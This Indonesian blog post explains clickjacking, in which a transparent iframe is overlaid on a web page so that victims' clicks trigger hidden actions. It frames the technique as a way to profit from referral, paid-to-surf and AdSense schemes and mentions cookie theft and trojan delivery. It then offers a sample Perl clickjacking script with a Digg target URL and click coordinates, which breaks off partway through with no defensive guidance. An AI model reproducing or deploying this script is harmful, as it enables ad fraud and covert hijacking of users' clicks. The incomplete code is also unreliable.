Bisa dikatakan bahwa clickjacking merupaka teknik berbahaya dimana injector akan memanfaatkan kelemahan web browser untuk mengeksekusi suatu script tanpa sepengetahuan korban. Dalam umumnya, teknik ini dimanfaatkan untuk mengeruk keuntungan dari program2 referal,paid to surf,adsense,dan sebagainya. Dalam tahap lanjut, tekhnik ini bisa saja digunakan untuk mencuri data pada komputer target/korban, misal mencuri cookies dsb.
Secara gampang cara kerja tekhnik ini adalah sbb :
1. sang injector menanam script clickjaking pada suatu halaman web
2. ketika korban mengunjungi web tersebut secara tidak sadar korban telah meload script yang ditanamkan. Maka script clickjacking akan berkerja dengan mengikuti posisi mouse & aksi mouse ( right/left click/etc).
3.ketika mouse korban melakukan perintah klik, maka clickjacking juga akan bekerja ( misal membuka halaman web tertentu, atau mungkin mengirimkan trojan kedalam pc korban untuk meload ads setiap waktu tertentu).
Logika teknik ini adalah :
- injector membuat script yang fungsinya menutup secara transparant mainpage/halaman asli dari web, misal iframe. Jadi sebenarnya yang ditampilkan jendela browser korban terlebih dahulu dari web target tersebut adalah iframe tersebut baru main pagenya web target.
- secara halus. script tersebut akan non aktif/disable ketika korban telah melakukan klik mouse & memunculkan halaman mainpage dari web target. jadi korban tidak sadar kalo yang baru saja diload adalah script inject an.
- pada aksi mouse kedua, yang dieksekusi adalah scipt dari mainpage web target, karena script clickjacking sudah tidak bekerja. Tapi Script ini akan keluar/enable lagi ketika korban mereload ulang halaman.
jadi, bisa disimpulkan sendirikan teknik ini sebenernya menguntungkan/merugikan?
berikut sample program untuk clickjacking yang dibuat dalam
Code:
#!/usr/local/bin/perl
#Generic Clickjacking script
#By Robert Hansen (09/29/2008) v0.6
###################################################################
#Bounding box for the target click
$xl = "40px"; #x axis of the upper left hand corner of $target
$yl = "249px"; #y axis of the upper left hand corner of $target
$xmsie = "40px"; #x axis if the browser is MSIE
$ymsie = "383px"; #y axis if the browser is MSIE
$width = 40; #width of the $target link/button
$height = 20; #height of the $target link/button
$nsleft = "405px"; #padding from left if the user isn't using script
$nstop = "114px"; #padding from the top of the user isn't using script
#page you want to Clickjack
$target =
"http://digg.com/celebrity/Christopher_Plummer_My_Sex_Injury_Made_Shatner_A_Star";
$opacity = "1.0"; #works in FF but not so well in IE-for debugging
###################################################################
#Todo - add clickjack detection for movement
if ($ENV{"HTTP_USER_AGENT"} =~ m/MSIE/) {
#Kinda stupid user agent detection... could definitely be improved
#especially considering this believes there are only two browsers in
#the world - MSIE and everything else.
$xl = $xmsie;
$yl = $ymsie;
Bagikan
clickjacking
4/
5
Oleh
demonbrando